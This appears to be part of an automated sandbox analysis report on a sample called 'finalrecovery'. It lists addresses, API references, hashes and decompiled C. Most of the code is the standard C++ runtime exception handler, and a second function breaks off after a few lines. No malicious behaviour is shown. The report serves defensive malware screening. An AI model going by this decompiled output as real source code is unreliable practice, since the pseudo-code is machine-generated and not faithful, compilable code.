0x0041212a
0x00412131
0x00412136
0x00000000
0x0041216e
0x00412176
0x004121da
0x004121da
0x004121dd
0x004121e0
0x004121e2
0x004121e5
0x004121e8
0x004121ee
0x0041239f
0x0041239f
0x004123a2
0x00000000
0x004123a4
0x004123a4
0x004123a7
0x00000000
0x004123ad
0x004123ad
0x004123b0
0x004123b3
0x004123b4
0x004123b5
0x004123b8
0x004123b9
0x004123bc
0x004123bd
0x004123c2
0x00000000
0x004123c2
0x004123a7
0x004121f4
0x004121f4
0x004121f8
0x00000000
0x004121fe
0x004121fe
0x00412205
0x0041221d
0x0041221d
0x00412220
0x00412223
0x00412229
0x00412239
0x0041223e
0x00412241
0x00412244
0x00412247
0x0041224a
0x0041224d
0x00412250
0x00412256
0x00412256
0x00412259
0x0041225c
0x0041226b
0x0041226c
0x0041226c
0x0041226e
0x00412271
0x00412277
0x0041227a
0x00412280
0x00412282
0x00412285
0x00412288
0x00412291
0x00412294
0x00412296
0x00412296
0x00412299
0x0041229c
0x0041229f
0x004122a2
0x004122a5
0x004122aa
0x004122ab
0x004122ac
0x004122ad
0x004122ae
0x004122b1
0x004122b3
0x004122b5
0x00000000
0x004122b7
0x004122b7
0x004122b7
0x004122ba
0x004122bd
0x004122bf
0x004122c0
0x004122c5
0x004122c8
0x004122ca
0x00000000
0x00000000
0x004122cc
0x004122cd
0x004122d0
0x004122d2
0x00000000
0x004122d4
0x004122d4
0x004122d7
0x004122da
0x00000000
0x004122da
0x00000000
0x004122d2
0x004122ee
0x004122f4
0x00412311
0x00412316
0x00412316
0x00412319
0x00412319
0x00000000
0x004122dd
0x004122dd
0x004122de
0x004122e1
0x004122e4
0x004122e7
0x004122e7
0x00000000
0x004122ec
0x00412288
0x0041227a
0x0041231c
0x0041231f
0x00412320
0x00412323
0x00412326
0x00412329
0x0041232c
0x0041232c
0x00412335
0x00412338
0x00412338
0x00412250
0x0041233b
0x0041233f
0x00412341
0x00412344
0x0041234a
0x0041234a
0x00412352
0x00412357
0x004123c5
0x004123c5
0x004123ca
0x004123ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00412359
0x00412359
0x0041235d
0x0041236f
0x00412372
0x00412375
0x00412377
0x0041238e
0x00412392
0x00412398
0x00412399
0x0041239b
0x00000000
0x0041239d
0x00000000
0x0041239d
0x00412379
0x0041237e
0x00412381
0x00412386
0x00412389
0x00000000
0x00412389
0x0041235f
0x00412362
0x00412365
0x00412367
0x00000000
0x00412369
0x00412369
0x0041236d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041236d
0x00412367
0x0041235d
0x00412207
0x00412207
0x0041220e
0x00000000
0x00412210
0x00412210
0x00412217
0x00000000
0x00000000
0x00000000
0x00000000
0x00412217
0x0041220e
0x00412205
0x004121f8
0x00412178
0x00412180
0x00412183
0x00412188
0x0041218c
0x0041218f
0x00412195
0x00412198
0x00000000
0x0041219a
0x0041219a
0x0041219d
0x0041219f
0x004123d5
0x004123d5
0x00000000
0x004121a5
0x004121ad
0x004121b8
0x00000000
0x00000000
0x004121c1
0x004121c4
0x004121c5
0x004121c8
0x004121ca
0x00000000
0x004121d0
0x00000000
0x004121d0
0x00000000
0x004121ca
0x004121a5
0x004123da
0x004123da
0x004123dc
0x004123dd
0x004123e4
0x004123e7
0x004123f5
0x004123fa
0x004123ff
0x00412402
0x00412407
0x0041240a
0x0041240d
0x0041240f
0x00412411
0x00412411
0x00412416
0x00412422
0x00412428
0x0041242d
0x00412430
0x00412431
0x00000000
0x00412431
0x00412198
0x00412176
0x00412136
0x00412117
0x00412109
0x004120d5

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0041218F
type_info::operator==.LIBVCRUNTIME ref: 004121B1
___TypeMatch.LIBVCRUNTIME ref: 004122C0
IsInExceptionSpec.LIBVCRUNTIME ref: 00412392
_UnwindNestedFrames.LIBCMT ref: 00412416
CallUnexpected.LIBVCRUNTIME ref: 00412431

Strings

csm, xrefs: 004121E8
csm, xrefs: 004120CF
csm, xrefs: 0041213C

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: e5d23d28f358b2e8c92ce666bbf2ad1a2d22d1c8777d4e261d8313f8a4198487
Instruction ID: ccb85f8cc84387cfbec14de75b6a1ccab12559c264fdf59c1e8d4f4ede46b13c
Opcode Fuzzy Hash: e5d23d28f358b2e8c92ce666bbf2ad1a2d22d1c8777d4e261d8313f8a4198487
Instruction Fuzzy Hash: CBB18E71800209EFCF18DFA5DA809DFB7B5FF18314B14415BE910AB251D3B8EAA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 100040D1 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E100040D1(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E10005038(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E100068B8(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E10003D8C(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E10003D8C(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E100033F6(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E10003329(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E10004051(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E100068B8(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E10003D8C(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E10003D8C(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E10003D8C(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E10003D8C(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E10003329(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E10004051(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E100036DF(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E10003D8C(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E10004AE0(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E10003D8C(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E10003D8C(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E10003D8C(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E10003D8C(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E10004AE0(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E1000687C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E10004774( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x100178d0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E100036DF(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E1000475C( &_v64);
											E10003908( &_v64, 0x1001589c);
											L63:
											 *(E10003D8C(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E10003D8C(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E1000351C(_t279, _t319, _t274);
											E100049E0(_a8, _a16, _t305);
											_t235 = E10004B9D(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E10004957(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x100040d1
0x100040d8
0x100040da
0x100040e3
0x100040e9
0x100040f1
0x100040f3
0x100040f6
0x100040fc
0x10004475
0x10004475
0x1000447a
0x1000447c
0x1000447e
0x10004481
0x10004482
0x10004485
0x1000448b
0x100045aa
0x10004491
0x10004491
0x10004492
0x10004493
0x1000449a
0x1000449d
0x100044a0
0x100044a6
0x100044a8
0x100044ad
0x100044b0
0x100044b2
0x100044b8
0x100044ba
0x100044c0
0x100044d5
0x100044da
0x100044dd
0x100044df
0x100045a6
0x00000000
0x100045a7
0x100044df
0x100044c0
0x100044b8
0x100044b0
0x100044e5
0x100044e8
0x100044eb
0x100044ee
0x100044f1
0x100044f7
0x10004509
0x1000450e
0x10004511
0x10004514
0x10004517
0x1000451a
0x1000451d
0x10004520
0x00000000
0x00000000
0x10004526
0x10004526
0x10004529
0x1000452c
0x1000453b
0x1000453c
0x1000453c
0x1000453e
0x10004541
0x00000000
0x00000000
0x10004543
0x10004546
0x00000000
0x00000000
0x10004554
0x10004556
0x10004559
0x1000455b
0x10004563
0x10004563
0x10004566
0x10004568
0x1000456a
0x10004586
0x1000458b
0x1000458e
0x1000458e
0x00000000
0x10004566
0x1000455d
0x10004561
0x00000000
0x00000000
0x00000000
0x10004591
0x10004594
0x10004595
0x10004598
0x1000459b
0x1000459e
0x100045a1
0x100045a1
0x00000000
0x1000452c
0x100045ab
0x100045b0
0x100045b1
0x100045b4
0x100045b7
0x100045b8
0x100045b9
0x100045ba
0x100045bd
0x100045bf
0x10004637
0x10004639
0x10004639
0x100045c1
0x100045c1
0x100045c4
0x100045c7
0x00000000
0x100045c9
0x100045c9
0x100045cc
0x100045cf
0x100045d6
0x100045d6
0x100045d9
0x100045db
0x100045dd
0x1000460f
0x1000460f
0x10004612
0x10004619
0x10004619
0x1000461c
0x1000461f
0x10004626
0x10004626
0x10004629
0x10004630
0x10004632
0x10004632
0x1000462b
0x1000462b
0x1000462e
0x00000000
0x00000000
0x1000462e
0x10004621
0x10004621
0x10004624
0x00000000
0x00000000
0x10004624
0x10004614
0x10004614
0x10004617
0x00000000
0x00000000
0x10004617
0x10004633
0x100045df
0x100045df
0x100045df
0x100045e2
0x100045e2
0x100045e4
0x100045e6
0x00000000
0x00000000
0x100045e8
0x100045ea
0x100045fe
0x100045fe
0x100045ec
0x100045ec
0x100045ef
0x100045f2
0x00000000
0x100045f4
0x100045f4
0x100045f7
0x100045fa
0x100045fc
0x00000000
0x00000000
0x00000000
0x00000000
0x100045fc
0x100045f2
0x10004607
0x10004607
0x10004609
0x00000000
0x1000460b
0x1000460b
0x1000460b
0x00000000
0x10004609
0x10004602
0x10004604
0x10004604
0x00000000
0x10004604
0x100045d1
0x100045d1
0x100045d4
0x00000000
0x00000000
0x00000000
0x00000000
0x100045d4
0x100045cf
0x100045c7
0x1000463a
0x1000463e
0x1000463e
0x1000410b
0x1000410b
0x10004114
0x10004211
0x10004211
0x10004214
0x00000000
0x10004143
0x10004143
0x10004148
0x00000000
0x1000414e
0x1000414e
0x10004156
0x1000440f
0x10004413
0x1000415c
0x10004161
0x10004164
0x10004169
0x10004170
0x10004175
0x00000000
0x100041ad
0x100041b5
0x10004219
0x10004219
0x1000421c
0x1000421f
0x10004221
0x10004224
0x10004227
0x1000422d
0x100043de
0x100043de
0x100043e1
0x00000000
0x100043e3
0x100043e3
0x100043e6
0x00000000
0x100043ec
0x100043ec
0x100043ef
0x100043f2
0x100043f3
0x100043f4
0x100043f7
0x100043f8
0x100043fb
0x100043fc
0x10004401
0x00000000
0x10004401
0x100043e6
0x10004233
0x10004233
0x10004237
0x00000000
0x1000423d
0x1000423d
0x10004244
0x1000425c
0x1000425c
0x1000425f
0x10004262
0x10004268
0x10004278
0x1000427d
0x10004280
0x10004283
0x10004286
0x10004289
0x1000428c
0x1000428f
0x10004295
0x10004295
0x10004298
0x1000429b
0x100042aa
0x100042ab
0x100042ab
0x100042ad
0x100042b0
0x100042b6
0x100042b9
0x100042bf
0x100042c1
0x100042c4
0x100042c7
0x100042d0
0x100042d3
0x100042d5
0x100042d5
0x100042d8
0x100042db
0x100042de
0x100042e1
0x100042e4
0x100042e9
0x100042ea
0x100042eb
0x100042ec
0x100042ed
0x100042f0
0x100042f2
0x100042f4
0x00000000
0x100042f6
0x100042f6
0x100042f6
0x100042f9
0x100042fc
0x100042fe
0x100042ff
0x10004304
0x10004307
0x10004309
0x00000000
0x00000000
0x1000430b
0x1000430c
0x1000430f
0x10004311
0x00000000
0x10004313
0x10004313
0x10004316
0x10004319
0x00000000
0x10004319
0x00000000
0x10004311
0x1000432d
0x10004333
0x10004350
0x10004355
0x10004355
0x10004358
0x10004358
0x00000000
0x1000431c
0x1000431c
0x1000431d
0x10004320
0x10004323
0x10004326
0x10004326
0x00000000
0x1000432b
0x100042c7
0x100042b9
0x1000435b
0x1000435e
0x1000435f
0x10004362
0x10004365
0x10004368
0x1000436b
0x1000436b
0x10004374
0x10004377
0x10004377
0x1000428f
0x1000437a
0x1000437e
0x10004380
0x10004383
0x10004389
0x10004389
0x10004391
0x10004396
0x10004404
0x10004404
0x10004409
0x1000440d
0x00000000
0x00000000
0x00000000
0x00000000
0x10004398
0x10004398
0x1000439c
0x100043ae
0x100043b1
0x100043b4
0x100043b6
0x100043cd
0x100043d1
0x100043d7
0x100043d8
0x100043da
0x00000000
0x100043dc
0x00000000
0x100043dc
0x100043b8
0x100043bd
0x100043c0
0x100043c5
0x100043c8
0x00000000
0x100043c8
0x1000439e
0x100043a1
0x100043a4
0x100043a6
0x00000000
0x100043a8
0x100043a8
0x100043ac
0x00000000
0x00000000
0x00000000
0x00000000
0x100043ac
0x100043a6
0x1000439c
0x10004246
0x10004246
0x1000424d
0x00000000
0x1000424f
0x1000424f
0x10004256
0x00000000
0x00000000
0x00000000
0x00000000
0x10004256
0x1000424d
0x10004244
0x10004237
0x100041b7
0x100041bf
0x100041c2
0x100041c7
0x100041cb
0x100041ce
0x100041d4
0x100041d7
0x00000000
0x100041d9
0x100041d9
0x100041dc
0x100041de
0x10004414
0x10004414
0x00000000
0x100041e4
0x100041ec
0x100041f7
0x00000000
0x00000000
0x10004200
0x10004203
0x10004204
0x10004207
0x10004209
0x00000000
0x1000420f
0x00000000
0x1000420f
0x00000000
0x10004209
0x100041e4
0x10004419
0x10004419
0x1000441b
0x1000441c
0x10004423
0x10004426
0x10004434
0x10004439
0x1000443e
0x10004441
0x10004446
0x10004449
0x1000444c
0x1000444e
0x10004450
0x10004450
0x10004455
0x10004461
0x10004467
0x1000446c
0x1000446f
0x10004470
0x00000000
0x10004470
0x100041d7
0x100041b5
0x10004175
0x10004156
0x10004148
0x10004114

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 100041CE
type_info::operator==.LIBVCRUNTIME ref: 100041F0
___TypeMatch.LIBVCRUNTIME ref: 100042FF
IsInExceptionSpec.LIBVCRUNTIME ref: 100043D1
_UnwindNestedFrames.LIBCMT ref: 10004455
CallUnexpected.LIBVCRUNTIME ref: 10004470

Strings

csm, xrefs: 1000410E
csm, xrefs: 10004227
csm, xrefs: 1000417B

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: c9310147905b7478ff4c788d929fc80281786d778b145132e007333c26a4496a
Instruction ID: 9895bfe6ee968b5b993bcac0bc1cc203535052d4e5567663f90001d50e574e89
Opcode Fuzzy Hash: c9310147905b7478ff4c788d929fc80281786d778b145132e007333c26a4496a
Instruction Fuzzy Hash: A6B19FB5D00209EFEF05DF94D88199EBBB5FF04390B12415AF8116B21ADB31EA61CB99

Uniqueness

Uniqueness Score: -1.00%

Function 10001C58 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10001C58(void* __ebx, struct _SECURITY_ATTRIBUTES** __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t61;
				struct _SECURITY_ATTRIBUTES* _t63;
				signed int _t65;
				void* _t67;
				intOrPtr* _t86;
				struct _SECURITY_ATTRIBUTES* _t87;
				signed int _t90;
				void* _t91;
				intOrPtr _t105;
				intOrPtr _t108;
				struct _SECURITY_ATTRIBUTES* _t111;
				void* _t112;
				intOrPtr* _t115;
				struct _SECURITY_ATTRIBUTES* _t116;
				signed int _t118;
				intOrPtr* _t128;
				intOrPtr* _t137;
				intOrPtr* _t139;
				intOrPtr* _t141;
				void* _t146;
				void* _t147;
				struct _SECURITY_ATTRIBUTES** _t150;
				void* _t151;
				signed int _t162;

				_t148 = __edi;
				E1000E879(0x1000fc99, __ebx, __edi, __esi);
				_t150 = __ecx;
				 *((intOrPtr*)(_t151 - 0x240)) = __ecx;
				_t111 = 0;
				 *((intOrPtr*)(_t151 - 0x240)) = __ecx;
				 *((intOrPtr*)(_t151 - 0x23c)) = 0;
				 *((intOrPtr*)(_t151 - 0x22c)) = 0;
				 *(_t151 - 0x228) = 0xf;
				 *((char*)(_t151 - 0x23c)) = 0;
				_t61 = _t151 - 0x11c;
				 *(_t151 - 4) = 0;
